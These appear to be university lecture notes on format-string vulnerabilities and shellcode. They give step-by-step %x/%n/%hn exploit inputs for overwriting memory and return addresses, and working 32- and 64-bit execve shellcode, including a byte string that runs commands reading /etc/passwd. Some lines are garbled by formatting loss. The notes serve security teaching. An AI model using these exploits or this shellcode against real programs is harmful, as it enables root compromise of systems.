Week 4: Format Strings and Shellcode

Format Strings and Shellcode

Format String Vulnerability

Outline
  • Format String
  • Access optional arguments
  • How printf() works
  • Format string attack
  • How to exploit the vulnerability
  • Countermeasures
Format String
  • printf(): Prints a string according to a format.
    intprintf(constcharformat,);int printf(const char *format, …);
  • Argument list of printf() consists of:
    • One concrete argument format
    • Zero or more optional arguments
  • Compilers don’t complain if fewer arguments are passed to printf() during invocation.
Access Optional Arguments
  • myprint() shows how printf() actually works.
  • Consider myprintf() invoked in line 7.
  • va_list pointer (line 1) accesses the optional arguments.
  • va_start() macro (line 2) calculates the initial position of va_list based on the second argument Narg (last argument before the optional arguments begin).
  • va_start() macro gets the start address of Narg, finds the size based on the data type, and sets the value for the va_list pointer.
  • va_list pointer advances using va_arg() macro.
  • va_arg(ap, int): Moves the ap pointer (va_list) up by 4 bytes.
  • When all the optional arguments are accessed, va_end() is called.
How printf() Accesses Optional Arguments
  • printf() has three optional arguments.
  • Elements starting with “%” are called format specifiers.
  • printf() scans the format string and prints out each character until “%” is encountered.
  • printf() calls va_arg(), which returns the optional argument pointed by va_list and advances it to the next argument.
  • When printf() is invoked, the arguments are pushed onto the stack in reverse order.
  • When it scans and prints the format string, printf() replaces %d with the value from the first optional argument and prints out the value.
  • va_list is then moved to the position 2.
  • va_arg() macro doesn’t understand if it reached the end of the optional argument list.
  • It continues fetching data from the stack and advancing the va_list pointer.
Format String Vulnerability
  • If user_input contains format specifiers, it becomes part of a format string.
Vulnerable Code Example
#include <stdio.h>
void fmtstr()
{
    char input [100];
    int var=0x11223344;

    /* print out information for experiment purpose */
    printf("Target address: %x\n", (unsigned) &var);
    printf("Data at target address: 0x%x\n", var);

    printf("Please enter a string: ");
    fgets (input, sizeof (input)-1, stdin);
    printf(input); // The vulnerable place
    printf("Data at target address: 0x%x\n", var);
}
void main() { fmtstr(); }
  • Inside printf(), the starting point of the optional arguments (va_list pointer) is the position right above the format string argument.
What Can We Achieve?
  • Attack 1: Crash program
  • Attack 2: Print out data on the stack
  • Attack 3: Change the program’s data in the memory
  • Attack 4: Change the program’s data to a specific value
  • Attack 5: Inject Malicious Code
Attack 1: Crash Program
  • Use input: %s%s%s%s%s%s%s%s
  • printf() parses the format string.
  • For each %s, it fetches a value where va_list points to and advances va_list to the next position.
  • Since %s interprets the value as an address and fetches data from that address, providing an invalid address will cause the program to crash.
Attack 2: Print Out Data on the Stack
  • To print out a secret variable on the stack:
  • Use user input: %x%x%x%x%x%x%x%x
  • printf() prints out the integer value pointed to by va_list pointer and advances it by 4 bytes.
  • The number of %x specifiers is determined by the distance between the starting point of the va_list pointer and the variable, achievable through trial and error.
Attack 3: Change Program’s Data in the Memory
  • Goal: change the value of var variable from 0x11223344 to some other value.
  • %n: Writes the number of characters printed out so far into memory.
  • printf(“hello%n”,&i) ⇒ When printf() gets to %n, it has already printed 5 characters, so it stores 5 to the provided memory address.
  • %n treats the value pointed to by the va_list pointer as a memory address and writes into that location.
  • If we want to write a value to a memory location, we need to have its address on the stack.
  • The address of var is provided at the beginning of the input so that it is stored on the stack.
  • $(command): Command substitution. Allows the output of the command to replace the command itself.
  • \x04: Indicates that “04” is an actual number and not as two ASCII characters. Assuming the address of var is 0xbffff304 (can be obtained using gdb)
  • var's address (0xbffff304) is on the stack.
  • Goal: To move the va_list pointer to this location and then use %n to store some value.
  • %x is used to advance the va_list pointer.
  • Using trial and error, check how many %x are needed to print out 0xbffff304.
  • If 6 %x format specifiers are needed, use 5 %x and 1 %n.
  • After the attack, data in the target address is modified to 0x2c (44 in decimal), because 44 characters have been printed out before %n.
Attack 4: Change Program’s Data to a Specific Value
  • Goal: To change the value of var from 0x11223344 to 0x9896a9
  • printf() has already printed out 41 characters before %.10000000x, so, 10000000+41 = 10000041 (0x9896a9) will be stored in 0xbffff304.
Attack 4: A Faster Approach
  • Goal: change the value of var to 0x66887799
  • Use %hn to modify the var variable two bytes at a time.
  • Break the memory of var into two parts, each with two bytes.
  • Most computers use the Little-Endian architecture
    • The 2 least significant bytes (0x7799) are stored at address 0xbffff304
    • The 2 most significant bytes (0x6688) are stored at 0xbffff306
  • If the first %hn gets value x, and before the next %hn, t more characters are printed, the second %hn will get value x+t.
  • Overwrite the bytes at 0xbffff306 with 0x6688.
  • Print some more characters so that when we reach 0xbffff304, the number of characters will be increased to 0x7799.
  • The attack format consists of:
    • Address A: first part of address of var (4 chars)
    • Address B: second part of address of var (4 chars)
    • 4 %.8x: To move va_list to reach Address 1 (Trial and error, 4x8=32)
    • @@@@: 4 chars
    • 5 _: 5 chars
    • Total: 12+5+32 = 49 chars
  • To print 0x6688 (26248), we need 26248 - 49 = 26199 characters as a precision field of %x.
  • If we use %hn after the first address, va_list will point to the second address and the same value will be stored.
  • Hence, put @@@@ between the two addresses so that we can insert one more %x and increase the number of printed characters to 0x7799.
  • After the first %hn, the va_list pointer points to @@@@, the pointer will advance to the second address. The precision field is set to 4368 =30617 - 26248 -1 in order to print 0x7799 (30617) when we reach second %hn.
Attack 5: Inject Malicious Code
  • Goal: Modify the return address of the vulnerable code and let it point to the malicious code (e.g., shellcode to execute /bin/sh). Get root access if the vulnerable code is a SET-UID program.
  • Challenges:
    • Inject Malicious code in the stack
    • Find starting address (A) of the injected code
    • Find return address (B) of the vulnerable code
    • Write value A to B
  • Using gdb to get the return address and start address of the malicious code.
  • Assume that the return address is 0xbffff38c
  • Assume that the start address of the malicious code is 0xbfff358
  • Goal: Write the value 0xbfff358 to address 0xbffff38c
    • Break 0xbffff38c into two contiguous 2-byte memory locations: 0xbffff38c and 0xbffff38e
    • Store 0xbfff into 0xbffff38e and 0xf358 into 0xbffff38c
  • Number of characters printed before the first %hn = 12 + (4x8) + 5 + 49102 = 49151 (0xbfff).
  • After the first %hn, 13144 + 1 =13145 are printed
  • 49151 + 13145 = 62296 (0xbffff358) is printed on 0xbffff38c
Countermeasures: Developer
  • Avoid using untrusted user inputs for format strings in functions like printf, sprintf, fprintf, vprintf, scanf, vfscanf.
Countermeasures: Compiler
  • Compilers can detect potential format string vulnerabilities.
  • Use two compilers to compile the program: gcc and clang.
  • There should be a mismatch in the format string.
  • With default settings, both compilers give warnings for the first printf().
  • No warning was given out for the second one.
  • On giving an option -wformat=2, both compilers give warnings for both printf statements stating that the format string is not a string literal.
  • These warnings just act as reminders to the developers that there is a potential problem but nevertheless compile the programs.
Other Countermeasures
  • Address randomization: Makes it difficult for the attackers to guess the address of the target memory (return address, address of the malicious code)
  • Non-executable Stack/Heap: Attackers can use the return-to-libc technique to defeat the countermeasure.
Summary of Format String Vulnerabilities
  • How format string works
  • Format string vulnerability
  • Exploiting the vulnerability
  • Injecting malicious code by exploiting the vulnerability

Shellcode

Outline
  • Challenges in writing shellcode
  • Two approaches
  • 32-bit and 64-bit Shellcode
Introduction
  • In code injection attack: need to inject binary code
  • Shellcode is a common choice
  • Its goal: get a shell. After that, arbitrary commands can be run
  • Written using assembly code
Writing a Simple Assembly Program
  • Invoke exit()
  • Compilation (32-bit)
    $ nasm -f elf32 -o myexit.o myexit.s
  • Linking to generate final binary
    $ ld -m elf_i386 myexit.o -o myexit
section .text
global _start
_start:
    mov eax, 1
    mov ebx, 0
    int 0x80
  • Consider the following program
int main(int argc, char **argv) {
    char buf[64];
    gets(buf);
}
  • Think about strcpy
THE BASIC IDEA
Writing Shellcode Using C.
#include <unistd.h>
void main()
{
    char *argv[2];
    argv[0] = "/bin/sh";
    argv[1] = NULL;
    execve (argv[0], argv, NULL);
}
Getting the Binary Code
$ gcc -m32 shellcode.c
$ objdump -Mintel --disassemble a.out
Writing Shellcode Using Assembly
  • Invoking execve(“/bin/sh”, argv, 0)
    • eax = 0x0b: execve() system call number
    • ebx = address of the command string “/bin/sh”
    • ecx = address of the argument array argv
    • edx = address of environment variables (set to 0)
Setting ebx
xor eax, eax
push eax
push "//sh"
push "/bin"
mov ebx, esp
Setting ecx
argv[0] = address of "/bin//sh"
argv[1] = 0
push eax
push ebx
mov ecx, esp
Setting edx
xor edx, edx
Invoking execve()
xor eax, eax
mov al, 0x0b
int 0x80
Putting Everything Together
xor eax, eax
push eax            ; Use 0 to terminate the string
push "//sh"
push "/bin"
mov ebx, esp        ; Get the string address

push eax            ; argv[1] = 0
push ebx            ; argv[0] points "/bin//sh"
mov ecx, esp        ; Get the address of argv[]

xor edx, edx        ; For environment variable, no env variables

xor eax, eax
mov al, 0x0b
int 0x80            ; Invoke execve ()
Compilation and Testing
$ nasm -f elf32 -o shellcode_one.o shellcode_one.s
$ ld -m elf_i386 -o shellcode_one shellcode_one.o
$ echo 
9650                <-- the current shell's process ID
$ ./shellcode_one
$ echo 
12380               <-- the current shell's process ID (a new shell)
GETTING RID OF ZEROS FROM SHELLCODE
How to Avoid Zeros
  • Using xor
    • mov eax, 0”: not good, it has a zero in the machine code
    • xor eax, eax”: no zero in the machine code
  • Using instruction with one-byte operand
    • How to save 0x00000099 to eax?
    • mov eax, 0x99”: not good, 0x99 is actually 0x00000099
    • xor eax, eax; mov al, 0x99”: al represent the last byte of eax
Using Shift Operator
  • How to assign 0x0011223344 to ebx?
mov ebx, 0xFF112233
shl ebx, 8
shr ebx, 8
Pushing the "/bin/bash" String Into Stack
  • Without using the // technique
mov edx, "htt"
shl edx, 24       ; shift left for 24 bits
shr edx, 24       ; shift right for 24 bits
push edx          ; edx now contains h\0\0\0
push "/bas"
push "/bin"
mov ebx, esp        ; Get the string address
ANOTHER APPROACH
Getting the Addresses of String and ARGV[]
  • This address is pushed into the stack by “call”
  • Pop out the address stored by “call”
two:
    call one
    db '/bin/sh*'
    db 'AAAA'
    db 'BBBB'
Data Preparation
; Putting a zero at the end of the shell string
xor eax, eax        ; eax contains a zero
mov [ebx+7], al

; Constructing the argument array
mov [ebx+8], ebx
mov [ebx+12], eax
lea ecx, [ebx+8]    ; let ecx = ebx +8
Compilation and Testing
  • Error (code region cannot be modified)
$ nasm -f elf32 -o shellcode_two.o shellcode_two.s
$ ld -m elf_i386 -o shellcode_two shellcode_two.o
$ ./shellcode_two
Segmentation fault
  • Make code region writable
$ nasm -f elf32 -o shellcode_two.o shellcode_two.s
$ ld --omagic -m elf_i386 -o shellcode_two shellcode_two.o
$ ./shellcode_two
$
  • <-- new shell
64-BIT SHELLCODE
_start:
    xor rdx, rdx          ; 3rd argument
    push rdx
    mov rax, "/bin//sh" ; 1st argument =  argv[1] = 0
    push rax              ; argv[0] points "/bin//sh"
    mov rdi, rsp          ; 2nd argument
    push rdx
    push rdi
    mov rsi, rsp

    xor rax, rax
    mov al, 0x3b          ; execve ( )
    syscall
A Generic Shellcode (64-bit)
  • Goal: execute arbitrary commands
  • /bin/bash -c "<commands>"
Data region
two:
    call one
    db '/bin/bash*'
    db '-c*'
    ; List of commands
    db '/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd'
    db 'AAAAAAAA'    ; Place holder for argv[0] --> "/bin/bash"
    db 'BBBBBBBB'    ; Place holder for argv[1] --> "-c"
    db 'CCCCCCCC'    ; Place holder for argv[2] --> the cmd string
    db 'DDDDDDDD'    ; Place holder for argv[3] --> NULL
Data Preparation (1)
one:
    pop rbx             ; Get the address of the data

    ; Add zero to each of string
    xor rax, rax
    mov [rbx+9], al     ; terminate the "/bin/bash" string
    mov [rbx+12], al    ; terminate the "-c" string
    mov [rbx+ARGV-1], al ; terminate the cmd string
Data Preparation (2)
; Construct the argument arrays
mov [rbx+ARGV], rbx        ; argv[0] --> "/bin/bash"
lea rcx, [rbx+10]
mov [rbx+ARGV+8], rcx     ; argv[1] --> "-c"
lea rcx, [rbx+13]
mov [rbx+ARGV+16], rcx    ; argv[2] --> the cmd string
mov [rbx+ARGV+24], rax    ; argv[3] = 0

; rdi --> "/bin/bash"
mov rdi, rbx
; rsi --> argv[]
lea rsi, [rbx+ARGV]
; rdx = 0
xor rdx, rdx
; execve ()
xor rax, rax
mov al, 0x3b
syscall
Machine Code
shellcode = (
    "\xeb\x36\x5b\x48\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x48"
    "\x89\x5b\x48\x48\x8d\x4b\x0a\x48\x89\x4b\x50\x48\x8d\x4b\x0d\x48"
    "\x89\x4b\x58\x48\x89\x43\x60\x48\x89\xdf\x48\x8d\x73\x48\x48\x31"
    "\xd2\x48\x31\xc0\xb0\x3b\x0f\x05\xe8\xc5\xff\xff\xff"
    "/bin/bash*"
    "-C*"
    "/bin/ls -1; echo Hello 64; /bin/tail -n 4 /etc/passwd"
    # The * in this comment serves as the position marker
    "AAAAAAAA"    # Placeholder for argv[0] --> "/bin/bash"
    "BBBBBBBB"    # Placeholder for argv[1] --> "-c"
    "CCCCCCCC"    # Placeholder for argv[2] --> the cmd string
    "DDDDDDDD"    # Placeholder for argv[3] --> NULL
).encode('latin-1')
Summary of Shellcode
  • Challenges in writing shellcode
  • Two approaches
  • 32-bit and 64-bit Shellcode
  • A generic shellcode